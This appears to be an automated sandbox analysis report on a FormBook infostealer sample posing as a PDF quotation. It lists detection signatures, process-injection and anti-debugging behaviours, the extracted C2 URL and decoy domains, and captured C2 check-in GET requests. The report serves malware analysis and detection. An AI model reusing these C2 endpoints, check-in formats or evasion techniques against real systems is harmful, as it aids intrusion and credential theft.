Analysis Report RFQ_AP65425652_032421 isu-isu,pdf.exe

Overview

General Information

Sample Name: RFQ_AP65425652_032421 isu-isu,pdf.exe
Analysis ID: 383968
MD5: 98f9ea244308bb5969ea3c302c32efcd
SHA1: 82a913894418af7834d23bc543eb286230d4edf4
SHA256: cd292d4cdb5ff8f2de087a09de2a152722d910f1df7ce7b65e6480be9ae77fdf
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.luegomusic.com/pe0r/"], "decoy": ["quickeasybites.com", "idilecup.com", "atelierdusalon.com", "tigerking-safe.com", "goinyourstrength.com", "ssfgasia.com", "halmanseger.com", "hpcovn.com", "thegodfatherricedealer.com", "hzmsbg.com", "trickswithwix.com", "rbvctiu.com", "spystoredevices.com", "monlexiem.com", "apt-forward.com", "medsez.cloud", "nanantz.com", "kf350.com", "ztvwgqjya.com", "countingeverything.com", "motion-mill-tv.com", "mex33.info", "desertfoxindustries.com", "welchmanlongbow.com", "beachnovotel.com", "basicchan.com", "boekhoudingwetteren.com", "pierresplayhouse.com", "xitiefilm.com", "betterskindays.com", "hdeamutfak.com", "sqjqw4.com", "coloradocouponclub.com", "leadershipcodes.com", "simplysouthdisinfecting.net", "lideresdeimmunocal.com", "tipsaglik.com", "greaterluxuryrehab.info", "tennesseewheelrepair.com", "5150shoshone.com", "slot-782.com", "cubitia.net", "fudweisj.icu", "forguyshere.com", "connect-alert-status.network", "hannahkaylewis.com", "soarcredits.com", "queensindustrial.com", "kudzuentertains.com", "maconhemorrhoidcenter.com", "1364kensington.com", "prestamosa.com", "lifeisgoingwells.com", "cloverunner.com", "4608capaydrive.com", "neomily.xyz", "blushingdevil.com", "essentials-trading.com", "theinfoinsider.com", "heftylefties.com", "zea-px16z.net", "thecapitalhut.com", "rootedwithlovejax.com", "nesreenibrahimmd.com"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll ReversingLabs: Detection: 22%
Multi AV Scanner detection for submitted file
Source: RFQ_AP65425652_032421 isu-isu,pdf.exe Virustotal: Detection: 35%
Source: RFQ_AP65425652_032421 isu-isu,pdf.exe ReversingLabs: Detection: 41%
Yara detected FormBook
Source: Yara match File source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: RFQ_AP65425652_032421 isu-isu,pdf.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.control.exe.4ca7960.4.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.control.exe.a0a460.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: RFQ_AP65425652_032421 isu-isu,pdf.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.668908847.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000000.00000003.646395751.000000001EF20000.00000004.00000001.sdmp, RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.691829468.0000000000ABF000.00000040.00000001.sdmp, control.exe, 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp
Source: Binary string: control.pdb source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692305154.0000000002620000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: RFQ_AP65425652_032421 isu-isu,pdf.exe, control.exe
Source: Binary string: control.pdbUGP source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692305154.0000000002620000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.668908847.0000000005A00000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA, 0_2_00405301
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose, 0_2_00405C94
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_004026BC FindFirstFileA, 0_2_004026BC

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 162.241.244.61:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 162.241.244.61:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 162.241.244.61:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 107.178.142.156:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 107.178.142.156:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 107.178.142.156:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 35.246.6.109:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 35.246.6.109:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 35.246.6.109:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.luegomusic.com/pe0r/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /pe0r/?jfIla4=0Af10zgbdIViNGwjb+Oc1SkLmd7m2ZIFRN/3MUqpHhZEI8ml+kTCEnXA5UxsPaJdSh4V&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.1364kensington.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pe0r/?jfIla4=DC2ddi2Ahi6YucIUNrYQstcO22XqbhtBVWVPx2koYqqK6B4m9xBdRgLT1ADwKwfYgKFO&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.luegomusic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pe0r/?jfIla4=EMcf7Z3h8uf0azWCSj7jkXkAyIPNvPvgl8GMAOH4p84rD0pfCkD41qqmtAVLjT1e92o/&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.kf350.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pe0r/?jfIla4=gvANDtPFS4AFIzDAH1LQr3uVNv4G+On6xarGfoEbOyx7OA32EqtB1F0pQLcAKQ6/fBeV&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.pierresplayhouse.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pe0r/?jfIla4=Vv4dR0U6ZhUzqX7Ytdkdbkwy06eZp55JqV7JXJhskJ3M1IOX6fIf5GSNO8ms0pPBZaWn&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.thecapitalhut.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pe0r/?jfIla4=edFFfaJfWRXJQQLXD8x02lpY2DcNAoQTA5Xlo1ZOoFa5RERkTfJxxWby4PUnbOfP3siZ&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.ssfgasia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pe0r/?jfIla4=z013FEPTRo1x+Iqvqy0nQ5Mm93icoZ0Dm/8PgHcP3O5T8Pkz5lNKJ8Gozvwfum0Zfhau&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.desertfoxindustries.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pe0r/?jfIla4=k6IhwNTsJPfJwlNAMD3cJduEXu+3VJeDR1xGn86Kxw1vpoAhQbb58cNQY6a9WWBFRY7O&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.tennesseewheelrepair.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /pe0r/?jfIla4=RrzzznHzvm1EAZS+513FKVr8vjbHVsjAfprUxrbk/aZWUqXE85HdCV+tXjNxRxdlhlWL&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.rootedwithlovejax.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 199.59.242.153
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: BODIS-NJUS
Source: Joe Sandbox View ASN Name: BIZLAND-SDUS
Source: Joe Sandbox View ASN Name: ASN-QUADRANET-GLOBALUS
Source: unknown DNS traffic detected: queries for: www.1364kensington.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 08 Apr 2021 11:22:07 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 
2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ hei
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp String found in binary or memory: http://business.google.com/
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp String found in binary or memory: http://business.google.com/website/rooted-with-love/pe0r/
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp String found in binary or memory: http://business.google.com/website/rooted-with-love/pe0r/&quot;
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000005.00000000.660312730.0000000002B50000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp String found in binary or memory: https://ads.google.com/localservices
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp String found in binary or memory: https://business.google.com
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp String found in binary or memory: https://lh5.googleusercontent.com/tnT1qBMzmyLgRDNYg3gq78quEpuZVERk849E090SPkl3uZ90NtOdF0DdK28eDthwrR
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp String found in binary or memory: https://rootedwithlovejax.com
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp String found in binary or memory: https://schema.org/LocalBusiness
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp String found in binary or memory: https://workspace.google.com
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/maps/dir//Rooted
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com/_/mss/boq-geo/_/js/k=boq-geo.GeoMerchantPrestoSiteUi.en_US.H3HiHVucosI.es5.O

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to read data from the clipboard
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00404EA0

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
